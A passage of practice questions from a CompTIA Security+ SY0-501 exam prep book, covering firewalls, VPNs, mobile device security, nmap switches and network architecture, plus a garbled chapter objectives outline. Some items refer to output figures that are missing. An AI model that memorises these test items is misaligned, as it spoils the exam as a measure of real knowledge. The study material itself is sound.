- A. DEP
- B. FDE
- C. UTM
- D. IDS
- 82. Sarah is the CIO for a small company. She recently had the entire company’s voice calls
- moved to VoIP. Her new VoIP system is using SIP with RTP. What might be the concern
- with this?
- A. SIP is not secure.
- B. RTP is not secure.
- C. RTP is too slow.
- D. SIP is too slow.
- 83. What command would generate the output shown here?
- A. nslookup
- B. ipconfig
- C. netstat -a
- D. dig
- 84. Emiliano is a network administrator for a large web-hosting company. His company also
- issues digital certificates to web-hosting clients. He wants to ensure that a digital certifi-
- cate will not be used once it has been revoked. He also wants to ensure that there will be
- no delay between when the certificate is revoked and when browsers are made aware that
- it is revoked. What solution would be best for this?
- A. OCSP
- B. X.509
- C. CRL
- D. PKI
- 85. Elizabeth is responsible for security at a defense contracting company. She is concerned
- about users within her network exfiltrating data by attaching sensitive documents to
- emails. What solution would best address this concern?
- A. Email encryption
- B. USB blocking
- C. NIPS
- D. Content filtering
- 86. Victor is concerned about data security on BYOD and COPE. He is concerned specifi-
- cally about data exposure should the device become lost or stolen. Which of the following
- would be most effective in countering this concern?
- A. Geofencing
- B. Screen lock
- C. GPS tagging
- D. Device encryption
- 87. Gabriel is using nmap to scan one of his servers whose IP address is 192.168.1.1. He wants
- to perform a ping scan, but the network blocks ICMP, so he will try a TCP ping scan and
- do so very slowly. Which of the following would accomplish that?
- A. nmap -O -PT -T1 192.168.1.1
- B. nmap -O – T3 192.168.1.1
- C. nmap -T -T1 192.168.1.1
- D. nmap -PT -T5 192.168.1.1
- 88. Mary is a network administrator for ACME Company. She sometimes needs to run a
- packet sniffer so that she can view the network traffic. She wants to find a well-known
- packet sniffer that works on Linux. Which of the following would be her best choice?
- A. Ophcrack
- B. Nmap
- C. Wireshark
- D. Tcpdump
- 89. What command produced the output shown here?
- A. tracert -h 10 www.chuckeasttom.com
- B. tracert www.chuckeasttom.com
- C. netstat www.chuckeasttom.com
- D. nmap www.chuckeasttom.com
- 90. Daryll has been using a packet sniffer to observe traffic on his company’s network. He has
- noticed that traffic between the web server and the database server is sent in clear text.
- He wants a solution that will not only encrypt that traffic, but also leverage the existing
- digital certificate infrastructure his company has. Which of the following would be the
- best solution for Daryll?
- A. TLS
- B. SSL
- C. IPSec
- D. WPA2
- 91. Jarod is concerned about DLP in his organization. Employees all have cloud-based solu-
- tions for data storage. What DLP-related security hazard, if any, might this create?
- A. No security hazard
- B. Malware from the cloud
- C. Data exfiltration through the cloud
- D. Security policies don’t apply to the cloud.
- 92. Derrick is a network administrator for a large company. The company network is seg-
- mented into zones of high security, medium security, low security, and the DMZ. He is
- concerned about external intruders and wishes to install a honeypot. Which is the most
- important zone to put the honeypot in?
- A. High security
- B. Medium security
- C. Low security
- D. DMZ
- 93. Sheila is responsible for data backups for all the company servers. She is concerned about
- frequency of backup and about security of the backup data. Which feature, found in some
- backup utility software, would be most important to her?
- A. Using data encryption
- B. Digitally signing the data
- C. Using automated backup scheduling
- D. Hashing the backup data
- 94. Frank is a web server administrator for a large e-commerce company. He is concerned
- about someone using netcat to connect to the company web server and retrieving detailed
- information about the server. What best describes his concern?
- A. Passive reconnaissance
- B. Active reconnaissance
- C. Banner grabbing
- D. Vulnerability scanning
- 95. Mike is responsible for testing security at his company. He is using a tool that identifies
- vulnerabilities and provides mechanisms to test them by attempting to exploit them. What
- best describes this type of tool?
- A. Vulnerability scanner
- B. Exploit framework
- C. Metasploit
- D. Nessus
- 96. William is a security officer for a large bank. When executives’ laptops are decommis-
- sioned, he wants to ensure that the data on those laptops is completely wiped so that it
- cannot be recovered, even using forensic tools. How many times should William wipe a
- hard drive?
- A. 1
- B. 3
- C. 5
- D. 7
- 97. You are responsible for firewalls in your organization. You are concerned about ensuring
- that all firewalls are properly configured. The gateway firewall is configured as follows:
- to only allow inbound traffic on a very few specific, required ports; all traffic (allowed
- or blocked) is logged and logs forwarded to the SIEM. What, if anything, is missing from
- this configuration?
- A. Nothing, it is a good configuration.
- B. Encrypting all traffic
- C. Outbound connection rules
- D. Digital certificate authentication for inbound traffic
- 98. Charles is responsible for security for web servers in his company. Some web servers are
- used for an internal intranet, and some for external websites. He has chosen to encrypt
- all web traffic, and he is using self-signed X.509 certificates. What, if anything, is wrong
- with this approach?
- A. He cannot encrypt all HTTP traffic.
- B. He should use PGP certificates.
- C. He should not use self-signed certificates.
- D. Nothing; this is an appropriate configuration.
- 99. You are responsible for the security of web servers at your company. You are configuring
- the WAF and want to allow only encrypted traffic to and from the web server, including
- traffic from administrators using a command-line interface. What should you do?
- A. Open port 80 and 23, and block port 443.
- B. Open port 443 and 23, and block port 80.
- C. Open port 443 and 22, and block port 80 and 23.
- D. Open port 443, and block all other ports.
- 100. Francis is a security administrator at a large law firm. She is concerned that confidential
- documents, with proprietary information, might be leaked. The leaks could be intentional
- or accidental. She is looking for a solution that would embed some identifying informa-
- tion into documents in such a way that it would not be seen by the reader but could be
- extracted with the right software. What technology would best meet Francis’s needs?
- A. Symmetric encryption
- B. Steganography
- C. Hashing
- D. Asymmetric encryption
- 101. You are responsible for the gateway firewall for your company. You need to configure a
- firewall to allow only email that is encrypted to be sent or received. What action should
- you take?
- A. Allow ports 25, 110, and 143. Block ports 465, 993, and 995.
- B. Block ports 25, 110, and 143. Allow ports 465, 993, and 995.
- C. Allow ports 25, 110, and 443. Block ports 465, 993, and 143.
- D. Block ports 465, 994, and 464. Allow ports 25, 110, and 80.
- 102. Mark is responsible for security for a small bank. He has a firewall at the gateway as well
- as one at each network segment. Each firewall logs all accepted and rejected traffic. Mark
- checks each of these logs regularly. What is the first step Mark should take to improve his
- firewall configuration?
- A. Integrate with SIEM.
- B. Add a honeypot.
- C. Integrate with AD.
- D. Add a honeynet.
- 103. You are setting up VPNs in your company. You are concerned that anyone running a
- packet sniffer could obtain metadata about the traffic. You have chosen IPSec. What
- mode should you use to accomplish your goals of preventing metadata being seen?
- A. AH
- B. ESP
- C. Tunneling
- D. Transport
- 104. John is responsible for configuring security devices in his network. He has implemented a
- robust NIDS in his network. However, on two occasions the NIDS has missed a breach.
- What configuration issue should John address?
- A. False negative
- B. Port blocking
- C. SPI
- D. False positive
- 105. You are responsible for communications security at your company. Your company has a
- large number of remote workers, including traveling salespeople. You wish to make sure that
- when they connect to the network, it is in a secure manner. What should you implement?
- A. L2TP VPN
- B. IPSec VPN
- C. Site-to-site VPN
- D. Remote-access VPN
- 106. Your company is issuing portable devices to employees for them to use for both work and
- personal use. This is done so the company can control the security of the devices. What, if
- anything, is an issue this process will cause?
- A. Personal information being exposed
- B. Company data being exfiltrated
- C. Devices being insecurely configured
- D. No issues
- 107. Marsha is responsible for mobile device security. Her company uses COPE for mobile
- devices. All phones and tablets have a screen lock and GPS tagging. What is the next,
- most important step for Marsha to take to secure the phones?
- A. Implement geofencing.
- B. Implement application management.
- C. Implement geolocation.
- D. Implement remote wipe.
- 108. Valerie is responsible for mobile device security at her company. The company is using
- BYOD. She is concerned about employees’ personal device usage compromising company
- data on the phones. What technology would best address this concern?
- A. Containerization
- B. Screen lock
- C. Full disk encryption
- D. Biometrics
- 109. Jack is a chief information security officer (CISO) for a small marketing company. The
- company’s sales staff travel extensively and all use mobile devices. He has recently become
- concerned about sideloading. Which of the following best describes sideloading?
- A. Installing applications to Android devices via USB
- B. Loading software on any device via WiFi
- C. Bypassing the screen lock
- D. Loading malware on a device without the user being aware
- 110. You are responsible for DLP at a large company. Some employees have COPE and others
- BYOD. What DLP issue might these devices present?
- A. COPE can be USB OTG.
- B. BYOD can be USB OTG.
- C. COPE and BYOD can be USB OTG.
- D. Only jailbroken COPE or BYOD can be USB OTG.
- 111. John is responsible for network security at a large company. He is concerned about a
- variety of attacks but DNS poisoning in particular. Which of the following protocols
- would provide the most help in mitigating this issue?
- A. IPSec
- B. DNSSEC
- C. L2TP
- D. TLS
- 112. You are responsible for network security at your company. You have discovered that NTP
- is not functioning properly. What security protocol will most likely be affected by this?
- A. Radius
- B. DNSSEC
- C. IPSec
- D. Kerberos
- 113. Frank is concerned about DHCP starvation attacks. He is even more worried since he
- learned that anyone can download software called a “gobbler” and execute a DHCP
- starvation attack. What technology would most help him mitigate this risk?
- A. Encrypt all DHCP communication with TLS.
- B. FDE on the DHCP server
- C. Network Address Allocation
- D. IPSec for all DHCP communications
- 114. You are trying to allocate appropriate numbers of IP addresses for various subnets in your
- network. What would be the proper CIDR notation for an IP v4 subnet with 59 nodes?
- A. /27
- B. /29
- C. /24
- D. /26
- 115. Lydia is trying to reduce costs at her company and at the same time centralize network
- administration and maintain direct control of the network. Which of the following solu-
- tions would provide the most network administration centralization and control while
- reducing costs?
- A. Outsourcing network administration
- B. IaaS
- C. PaaS
- D. Moving all OSs to open source
- 116. You are investigating a remote access protocol for your company to use. The protocol
- needs to fully encrypt the message, use reliable transport protocols, and support a range
- of network protocols. Which of the following would be the best choice?
- A. RADIUS
- B. Diameter
- C. TACACS +
- D. IPSec
- 117. Carrol is responsible for network connectivity in her company. The sales department is
- transitioning to VoIP. What are two protocols she must allow through the firewall?
- A. RADIUS and SNMP
- B. TCP and UDP
- C. SIP and RTP
- D. RADIUS and SIP
- 118. John is setting up all the database servers on their own subnet. He has placed them on
- 10.10.3.3/29. How many nodes can be allocated in this subnet?
- A. 32
- B. 16
- C. 8
- D. 6
- 119. Carlos is a security manager for a small company that does medical billing and records
- management. He is using application blacklisting to prevent malicious applications from
- being installed. What, if anything, is the weakness with this approach?
- A. None, this is the right approach.
- B. It might block legitimate applications.Chapter 2
- C. It might fail to block malicious applications.
- D. It will limit productivity.
- 120. Joanne is a security administrator for a large company. She discovered that approximately
- 100 machines on her network were recently attacked by a major virus. She is concerned
- because there was a patch available that would have stopped the virus from having any
- impact. What is the best solution for her to implement on her network?
- A. Installing patch management software
- B. Using automatic updates
- C. Putting unpatched machines on a Bridge
- D. Scanning all machines for patches every day
- 121. A review of your company’s network traffic shows that most of the malware infections are
- caused by users visiting illicit websites. You want to implement a solution that will block
- these websites, scan all web traffic for signs of malware, and block the malware before it
- enters the company network. Which of the following technologies would be the best
- solution?
- A. IDS
- B. Firewall
- C. UTM
- D. SIEM
- 122. You work for a large bank. The bank is trying to limit the risk associated with the use of
- unapproved USB devices to copy documents. Which of the following would be the best
- solution to this problem?
- A. IDS
- B. DLP
- C. Content filtering
- D. NIPS
- 123. Match the letter of the functionality with the device in the following table.
- A. Detect intrusions on a single machine
- B. Use aggregate logs
- C. Filter network packets based on a set of rules
- D. Detect intrusions on a network segment
- Firewall
- HIDS
- SIEM
- NIDS
- 124. Francine is concerned about employees in her company jailbreaking their COPE devices.
- What would be the most critical security concern for jailbroken devices?
- A. They would no longer get security patches.
- B. It would disable FDE.
- C. Unauthorized applications could be installed.
- D. Data could be exfiltrated on these devices.
- 125. You are responsible for mobile device security in your company. Employees have COPE
- devices. Many employees only enter the office infrequently, and you are concerned that
- their devices are not receiving firmware updates on time. What is the best solution for this
- problem?
- A. Scheduled office visits for updates
- B. OTA updates
- C. Moving from COPE to BYOD
- D. A policy that requires users to update their firmware regularly
- 126. Frank is looking for a remote authentication and access protocol. It must be one that uses
- UDP due to firewall rules. Which of the following would be the best choice?
- A. RADIUS
- B. Diameter
- C. TACACS +
- D. IPSec
- 127. You have discovered that one of the employees at your company tethers her smartphone
- to her work PC to bypass the corporate web security and access prohibited websites while
- connected to the LAN. What would be the best way to prevent this?
- A. Disable wireless access.
- B. Implement a WAF.
- C. Implement a policy against tethering.
- D. Implement an HIPS.
- 128. You work for a large bank. One of your responsibilities is to ensure that web banking
- logins are as secure as possible. You are concerned that a customer’s account login could
- be compromised and someone else would use that login to access the customer’s account.
- What is the best way to mitigate this threat?
- A. Use SMS authentication for any logins from an unknown location or computer.
- B. Encrypt all traffic via TLS.
- C. Require strong passwords.
- D. Do not allow customers to log on from any place other than their home computer.
- 129. You have discovered that some employees in your company have installed custom firm-
- ware on their portable devices. What security flaw would this most likely lead to?
- A. Unauthorized software can run on the device.
- B. The device may not connect to the network.
- C. The device will overheat.
- D. This is not really a security issue.
- 130. You are configuring BYOD access for your company. You want the absolute most robust
- security for the BYOD on your network. What would be the best solution?
- A. Agentless NAC
- B. Agent NAC
- C. Digital certificate authentication
- D. Two-factor authentication
- 131. You work for a large law firm and are responsible for network security. It is common for
- guests to come to the law firm (clients, expert witnesses, etc.) who need to connect to the
- firm’s WiFi. You wish to ensure that you provide the maximum security when these guests
- connect with their own devices, but you also wish to provide assurance to the guest that
- you will have minimal impact on their device. What is the best solution?
- A. Permanent NAC agent
- B. Agentless NAC
- C. Dissolvable NAC agent
- D. Implement COPE
- 132. Tom is concerned about how his company can best respond to breaches. He is interested
- in finding a way to identify files that have been changed during the breach. What would
- be the best solution for him to implement?
- A. NAC
- B. NIDS
- C. File integrity checker
- D. Vulnerability scanner
- 133. Mary works for a large insurance company and is responsible for cybersecurity. She is
- concerned about insiders and wants to detect malicious activity on the part of insiders.
- But she wants her detection process to be invisible to the attacker. What technology best
- fits these needs?
- A. Hybrid NIDS
- B. Out-of-band NIDS
- C. NIPS
- D. NNIDS
- 134. Denish is responsible for security at a large financial services company. The company
- frequently uses SSL/TLS for connecting to external resources. He has concerns that an
- insider might exfiltrate data using an SSL/TLS tunnel. What would be the best solution to
- this issue?
- A. NIPS
- B. SSL decryptor
- C. NIDS
- D. SSL accelerator
- 135. You want to allow a media gateway to be accessible through your firewall. What ports
- should you open? (Choose two.)
- A. 2427
- B. 1707
- C. 2227
- D. 1727
- 136. Match the letter with the protocol in the following table.
- A. Wireless security
- B. Voice over IP
- C. VPN
- D. Secure command-line interface
- IPSec
- WPA2
- SSH
- SIP
- 137. Dennis is implementing wireless security throughout his network. He is using WPA2.
- However, there are some older machines that cannot connect to WPA2—they only
- support WEP. At least for now, he must keep these machines. What is the best solution
- for this problem?
- A. Put those machines on a different VLAN.
- B. Deny wireless capability for those machines.
- C. Put those machines on a separate wireless network with separate WAP.
- D. Encrypt their traffic with TLS.
- 138. You are a security administrator for Acme Company. Employees in your company
- routinely upload and download files. You are looking for a method that allows users to
- remotely upload or download files in a secure manner. The solution must also support
- more advanced file operations such as creating directories, deleting files, and so forth.
- What is the best solution for this?
- A. SFTP
- B. SSH
- C. SCP
- D. IPSec
- 139. Your company allows BYOD on the network. You are concerned about the risk of malicious
- apps being introduced to your network. Which of the following policies would be most help-
- ful in mitigating that risk?
- A. Prohibiting apps from third-party stores
- B. Application blacklisting
- C. Antimalware scanning
- D. Requiring FDE on BYOD
- 140. John is the CISO for a small company. The company has password policies, but John is
- not sure the policies are adequate. He is concerned that someone might be able to “crack”
- company passwords. What is the best way for John to determine whether his passwords
- are vulnerable?
- A. Run a good vulnerability scan.
- B. Perform a password policy audit.
- C. Use one or more password crackers himself.
- D. Ensure that passwords are stored as a hash.
- 141. You are scanning your network using a packet sniffer. You are seeing traffic on ports
- 25 and 110. What security flaw would you most likely notice on these ports?
- A. Website vulnerabilities
- B. Unencrypted credentials
- C. Misconfigured FTP
- D. Digital certificate errors
- 142. Abigail is a network administrator with ACME Company. She believes that a network
- breach has occurred in the data center as a result of a misconfigured router access list,
- allowing outside access to an SSH server. Which of the following should she search for
- in the logs to confirm if such a breach occurred?
- A. Traffic on port 23
- B. Traffic on port 22
- C. Unencrypted credentials
- D. Malformed network packets
- 143. Gianna is evaluating the security of her company. The company has a number of mobile
- apps that were developed in house for use on COPE devices. She wants to ensure that
- these apps are updated as soon as an update is available. What should she ensure is being
- used?
- A. Firmware OTA
- B. Push notifications
- C. Scheduled updates
- D. A policy against custom firmware
- 144. Liam is concerned about the security of both COPE and BYOD devices. His company uses
- a lot of Android-based devices, and he is concerned about users getting administrative
- access and altering security features. What should he prohibit in his company?
- A. Third-party app stores
- B. Jailbreaking
- C. Custom firmware
- D. Rooting
- 145. Heidi works for a large company that issues various mobile devices (tablets and phones)
- to employees. She is concerned about unauthorized access to mobile devices. Which of the
- following would be the best way to mitigate that concern?
- A. Biometrics
- B. Screen lock
- C. Context-aware authentication
- D. Storage segmentation
- 146. You are looking for a point-to-point connection method that would allow two devices to
- synchronize data. The solution you pick should not be affected by EMI (electromagnetic
- interference) and should be usable over distances exceeding 10 meters, provided there is a
- line-of-sight connection. What would be the best solution?
- A. Bluetooth
- B. WiFi
- C. Infrared
- D. RF
- 147. You wish to use nmap to scan one of your servers, whose IP address is 192.168.1.16. The
- target is one of your own Windows servers. You want a scan that is the most thorough,
- and you are not concerned about it being detected. Which of the following would best
- accomplish that?
- A. nmap -sW -sL -T1 192.168.1.16/24
- B. nmap -sW -sT -T1 192.168.1.16
- C. nmap -sW -sT -T5 192.168.1.16/24
- D. nmap -sW -sT -sO -T5 192.168.1.16
- 148. What command would produce the output shown here?
- A. nestat -a
- B. arp -a
- C. arp -s
- D. netstat -s
- 149. Ethan has noticed some users on his network accessing inappropriate videos. His network
- uses a proxy server that has content filtering with blacklisting. What is the most likely
- cause of this issue?
- A. Sites not on the blacklist
- B. Misconfigured content filtering
- C. Misconfigured proxy server
- D. Someone circumventing the proxy server
- 150. You are looking for tools to assist in penetration testing your network. Which of the
- following best describes Metasploit?
- A. Hacking tool
- B. Vulnerability scanner
- C. Exploit framework
- D. Network scanner
- 151. Logan is responsible for enforcing security policies in his company. There are a number of
- policies regarding the proper configuration of public-facing servers. Which of the follow-
- ing would be the best way for Logan to check to see if such policies are being enforced?
- A. Periodically audit selected servers.
- B. Implement a configuration compliance scanning solution.
- C. Conduct routine penetration tests of those servers.
- D. Implement a vulnerability scanning solution.
- ++++++
- +++++
- Architecture and
- Design
- The CompTIA Security+ Exam
- SY0-501 topics covered in this
- chapter include the following:
- ✓ ✓ 3.1 Explain use cases and purpose for frameworks, best
- practices and secure configuration guides.
- ■ ■
- ■ ■
- Industry-standard frameworks and reference architectures
- ■ ■ Regulatory
- ■ ■ Non-regulatory
- ■ ■ National vs. international
- ■ ■ Industry-specific frameworks
- Benchmarks/secure configuration guides
- ■ ■
- ■ ■
- ■ ■
- Platform/vendor-specific guides
- ■ ■ Web server
- ■ ■ Operating system
- ■ ■ Application server
- ■ ■ Network infrastructure devices
- General purpose guides
- Defense-in-depth/layered security
- ■ ■ Vendor diversity
- ■ ■ Control diversity
- ■ ■
- ■ ■ Administrative
- ■ ■ Technical
- User training
- ✓ ✓ 3.2 Given a scenario, implement secure network
- architecture concepts.
- ■ ■
- Zones/topologies
- ■ ■
- DMZ■ ■
- ■ ■
- ■ ■
- ■ ■
- ■ ■ Extranet
- ■ ■ Intranet
- ■ ■ Wireless
- ■ ■ Guest
- ■ ■ Honeynets
- ■ ■ NAT
- ■ ■ Ad hoc
- Segregation/segmentation/isolation
- ■ ■ Physical
- ■ ■ Logical (VLAN)
- ■ ■ Virtualization
- ■ ■ Air gaps
- Tunneling/VPN
- ■ ■ Site-to-site
- ■ ■ Remote access
- Security device/technology placement
- ■ ■ Sensors
- ■ ■ Collectors
- ■ ■ Correlation engines
- ■ ■ Filters
- ■ ■ Proxies
- ■ ■ Firewalls
- ■ ■ VPN concentrators
- ■ ■ SSL accelerators
- ■ ■ Load balancers
- ■ ■ DDoS mitigator
- ■ ■ Aggregation switches
- ■ ■ Taps and port mirror
- SDN✓ ✓ 3.3 Given a scenario, implement secure systems design.
- ■ ■
- ■ ■
- Hardware/firmware security
- ■ ■ FDE/SED
- ■ ■ TPM
- ■ ■ HSM
- ■ ■ UEFI/BIOS
- ■ ■ Secure boot and attestation
- ■ ■ Supply chain
- ■ ■ Hardware root of trust
- ■ ■ EMI/EMP
- Operating systems
- ■ ■
- ■ ■
- Types
- ■ ■ Network
- ■ ■ Server
- ■ ■ Workstation
- ■ ■ Appliance
- ■ ■ Kiosk
- ■ ■ Mobile OS
- ■ ■ Patch management
- ■ ■ Disabling unnecessary ports and services
- ■ ■ Least functionality
- ■ ■ Secure configurations
- ■ ■ Trusted operating system
- ■ ■ Application whitelisting/blacklisting
- ■ ■ Disable default accounts/passwords
- Peripherals
- ■ ■ Wireless keyboards
- ■ ■ Wireless mice
- ■ ■ Displays
- ■ ■ WiFi-enabled MicroSD cards
- ■ ■ Printers/MFDs
- ■ ■ External storage devices
- ■ ■ Digital cameras✓ ✓ 3.4 Explain the importance of secure staging
- deployment concepts.
- ■ ■ Sandboxing
- ■ ■ Environment
- ■ ■ Development
- ■ ■ Test
- ■ ■ Staging
- ■ ■ Production
- ■ ■ Secure baseline
- ■ ■ Integrity measurement
- ✓ ✓ 3.5 Explain the security implications of embedded
- systems.
- ■ ■ SCADA/ICS
- ■ ■ Smart devices/IoT
- ■ ■ Wearable technology
- ■ ■ Home automation
- ■ ■ HVAC
- ■ ■ SoC
- ■ ■ RTOS
- ■ ■ Printers/MFDs
- ■ ■ Camera systems
- ■ ■ Special purpose
- ■ ■ Medical devices
- ■ ■ Vehicles
- ■ ■ Aircraft/UAV
- ✓ ✓ 3.6 Summarize secure application development and
- deployment concepts.
- ■ ■
- Development life-cycle models
- ■ ■
- ■ ■
- Waterfall vs. Agile
- Secure DevOps
- ■ ■ Security automation
- ■ ■ Continuous integration■ ■ Baselining
- ■ ■ Immutable systems
- ■ ■ Infrastructure as code
- ■ ■ Version control and change management
- ■ ■ Provisioning and deprovisioning
- ■ ■ Secure coding techniques
- ■ ■
- ■ ■
- ✓ ✓ 3.7
- ■ ■
- ■ ■ Proper error handling
- ■ ■ Proper input validation
- ■ ■ Normalization
- ■ ■ Stored procedures
- ■ ■ Code signing
- ■ ■ Encryption
- ■ ■ Obfuscation/camouflage
- ■ ■ Code reuse/dead code
- ■ ■ Server-side vs. client-side execution and validation
- ■ ■ Memory management
- ■ ■ Use of third-party libraries and SDKs
- ■ ■ Data exposure
- Code quality and testing
- ■ ■ Static code analyzers
- ■ ■ Dynamic analysis (e.g., fuzzing)
- ■ ■ Stress testing
- ■ ■ Model verification
- Compiled vs. runtime code
- Summarize cloud and virtualization concepts.
- Hypervisor
- ■ ■ Type I
- ■ ■ Type II
- ■ ■ Application cells/containers
- ■ ■ VM sprawl avoidance
- ■ ■ VM escape protection
- ■ ■ Cloud storage■ ■
- Cloud deployment models
- ■ ■ SaaS
- ■ ■ PaaS
- ■ ■ IaaS
- ■ ■ Private
- ■ ■ Public
- ■ ■ Hybrid
- ■ ■ Community
- ■ ■ On-premise vs. hosted vs. cloud
- ■ ■ VDI/VDE
- ■ ■ Cloud access security broker
- ■ ■ Security as a Service
- ✓ ✓ 3.8 Explain how resiliency and automation strategies
- reduce risk.
- ■ ■
- Automation/scripting
- ■ ■ Automated courses of action
- ■ ■ Continuous monitoring
- ■ ■ Configuration validation
- ■ ■ Templates
- ■ ■ Master image
- ■ ■ Non-persistence
- ■ ■ Snapshots
- ■ ■ Revert to known state
- ■ ■ Rollback to known configuration
- ■ ■ Live boot media
- ■ ■ Elasticity
- ■ ■ Scalability
- ■ ■ Distributive allocation
- ■ ■ Redundancy
- ■ ■ Fault tolerance
- ■ ■ High availability
- ■ ■ RAID✓ ✓ 3.9
- Explain the importance of physical security controls.
- ■ ■ Lighting
- ■ ■ Signs
- ■ ■ Fencing/gate/cage
- ■ ■ Security guards
- ■ ■ Alarms
- ■ ■ Safe
- ■ ■ Secure cabinets/enclosures
- ■ ■ Protected distribution/Protected cabling
- ■ ■ Airgap
- ■ ■ Mantrap
- ■ ■ Faraday cage
- ■ ■ Lock types
- ■ ■ Biometrics
- ■ ■ Barricades/bollards
- ■ ■ Tokens/cards
- ■ ■ Environmental controls
- ■ ■ HVAC
- ■ ■ Hot and cold aisles
- ■ ■ Fire suppression
- ■ ■ Cable locks
- ■ ■ Screen filters
- ■ ■ Cameras
- ■ ■ Motion detection
- ■ ■ Logs
- ■ ■ Infrared detection
- ■ ■ Key management
- ■
- Architecture and Design
- 1. Caroline has been asked to find a standard to guide her company’s choices in
- implementing information security management systems. She is looking for a standard
- that is international. Which of the following would be the best choice for her?
- A. ISO 27002
- B. ISO 27017
- C. NIST 800-12
- D. NIST 800-14
- 2. You are responsible for network security at an e-commerce company. You want to ensure
- that you are using best practices for the e-commerce website your company hosts. What
- standard would be the best for you to review?
- A. OWASP
- B. NERC
- C. NIST
- D. ISA/IEC
- 3. Cheryl is responsible for cybersecurity at a mid-sized insurance company. She has decided
- to utilize a different vendor for network antimalware than she uses for host antimalware.
- Is this a recommended action, and why or why not?
- A. This is not recommended; you should use a single vendor for a particular security
- control.
- B. This is recommended; this is described as vendor diversity.
- C. This is not recommended; this is described as vendor forking.
- D. It is neutral. This does not improve or detract from security.
- 4. Maria is a security administrator for a large bank. She is concerned about malware, par-
- ticularly spyware that could compromise customer data. Which of the following would be
- the best approach for her to mitigate the threat of spyware?
- A. Computer usage policies, network antimalware, and host antimalware
- B. Host antimalware and network antimalware
- C. Host and network antimalware, computer usage policies, and website whitelisting
- D. Host and network antimalware, computer usage policies, and employee training
- 5. Gabriel is setting up a new e-commerce server. He is concerned about security issues.
- Which of the following would be the best location to place an e-commerce server?
- A. DMZ
- B. Intranet
- C. Guest network
- D. Extranet
- 6. Enrique is concerned about backup data being infected by malware. The company backs
- up key servers to digital storage on a backup server. Which of the following would be
- most effective in preventing the backup data being infected by malware?
- A. Place the backup server on a separate VLAN.
- B. Air-gap the backup server.
- C. Place the backup server on a different network segment.
- D. Use a honeynet.
- 7. Janelle is the security administrator for a small company. She is trying to improve security
- throughout the network. Which of the following steps should she take first?
- A. Implement antimalware on all computers.
- B. Implement acceptable use policies.
- C. Turn off unneeded services on all computers.
- D. Turn on host-based firewalls on all computers.
- 8. Mary is the CISO for a mid-sized company. She is attempting to mitigate the danger
- of computer viruses. Which administrative control can she implement to help achieve
- this goal?
- A. Implement host-based antimalware.
- B. Implement policies regarding email attachments and file downloads.
- C. Implement network-based antimalware.
- D. Block portable storage devices from being connected to computers.
- 9. You are the network administrator for a large company. Your company frequently has
- nonemployees in the company such as clients and vendors. You have been directed to
- provide these nonemployees with access to the Internet. Which of the following is the best
- way to implement this?
- A. Establish a guest network.
- B. Allow nonemployees to connect only to the DMZ.
- C. Allow nonemployees to connect only to the intranet.
- D. Establish limited accounts on your network for nonemployees to use.
- 10. Juan is a network administrator for an insurance company. His company has a number
- of traveling salespeople. He is concerned about confidential data on their laptops. What is
- the best way for him to address this?
- A. FDE
- B. TPM
- C. SDN
- D. DMZ
- 11. Terrance is responsible for secure communications on his company’s network. The
- company has a number of traveling salespeople who need to connect to network
- resources. What technology would be most helpful in addressing this need?
- A. VPN concentrator
- B. SSL accelerator
- C. DMZ
- D. Guest network
- 12. Mohaned is concerned about malware infecting machines on his network. One of his
- concerns is that malware would be able to access sensitive system functionality that
- requires administrative access. What technique would best address this issue?
- A. Implementing host-based antimalware
- B. Using a nonadministrative account for normal activities
- C. Implementing FDE
- D. Making certain the operating systems are patched
- 13. John works for an insurance company. His company uses a number of operating systems,
- including Windows and Linux. In this mixed environment, what determines the network
- operating system?
- A. The OS of the DNS server
- B. The OS of the domain controller
- C. The OS of the majority of servers
- D. The OS of the majority of client computers
- 14. Juanita is implementing virtualized systems in her network. She is using Type I
- hypervisors. What operating system should be on the machines for her to install
- the hypervisor?
- A. None
- B. Windows
- C. Any operating system
- D. Windows or Linux
- 15. You are responsible for security at your company. You want to improve cloud security by
- following the guidelines of an established international standard. What standard would
- be most helpful?
- A. NIST 800-14
- B. NIST 800-53
- C. ISO 27017
- D. ISO 27002
- 16. You are responsible for setting up a kiosk computer that will be in your company’s lobby.
- It will be accessible for visitors to locate employee offices, obtain the guest WiFi pass-
- word, and retrieve general public company information. What is the most important thing
- to consider when configuring this system?
- A. Using a strong administrator password
- B. Limiting functionality to only what is needed
- C. Using good antivirus protection
- D. Implementing a host-based firewall
- 17. You are concerned about peripheral devices being exploited by an attacker. Which of the
- following is the first step you should take to mitigate this threat?
- A. Disable WiFi for any peripheral that does not absolutely need it.
- B. Enable BIOS protection for peripheral devices.
- C. Use strong encryption on all peripheral devices.
- D. Configure antivirus on all peripherals.
- 18. Which design concept limits access to systems from outside users while protecting users
- and systems inside the LAN?
- A. DMZ
- B. VLAN
- C. Router
- D. Guest network
- 19. Which of the following is the equivalent of a VLAN from a physical security perspective?
- A. Perimeter security
- B. Partitioning
- C. Security zones
- D. Firewall
- 20. In an attempt to observe hacker techniques, a security administrator configures a
- nonproduction network to be used as a target so that he can covertly monitor network
- attacks. What is this type of network called?
- A. Active detection
- B. False subnet
- C. IDS
- D. Honeynet
- 21. You have instructed all administrators to disable all nonessential ports on servers at their
- sites. Why are nonessential protocols a security issue that you should be concerned about?
- A. Nonessential ports provide additional areas of attack.
- B. Nonessential ports can’t be secured.
- C. Nonessential ports are less secure.
- D. Nonessential ports require more administrative effort to secure.
- 22. Which type of firewall examines the content and context of each packet it encounters?
- A. Packet filtering firewall
- B. Stateful packet filtering firewall
- C. Application layer firewall
- D. Gateway firewall
- 23. Which of the following would prevent a user from installing a program on a company-
- owned mobile device?
- A. Whitelisting
- B. Blacklisting
- C. ACL
- D. HIDS
- 24. You’re designing a new network infrastructure so that your company can allow unauthen-
- ticated users connecting from the Internet to access certain areas. Your goal is to protect
- the internal network while providing access to those areas. You decide to put the web
- server on a separate subnet open to public contact. What is this subnet called?
- A. Guest network
- B. DMZ
- C. Intranet
- D. VLAN
- 25. Upper management has decreed that a firewall must be put in place immediately, before
- your site suffers an attack similar to one that struck a sister company. Responding to
- this order, your boss instructs you to implement a packet filter by the end of the week. A
- packet filter performs which function?
- A. Prevents unauthorized packets from entering the network
- B. Allows all packets to leave the network
- C. Allows all packets to enter the network
- D. Eliminates collisions in the network
- 26. You’re outlining your plans for implementing a wireless network to upper management.
- Which protocol was designed to provide security for a wireless network and is considered
- equivalent to the security of a wired network?
- A. WAP
- B. WPA
- C. WPA2
- D. WEP
- 27. An IV attack is usually associated with which of the following wireless protocols?
- A. WEP
- B. WAP
- C. WPA
- D. WPA2
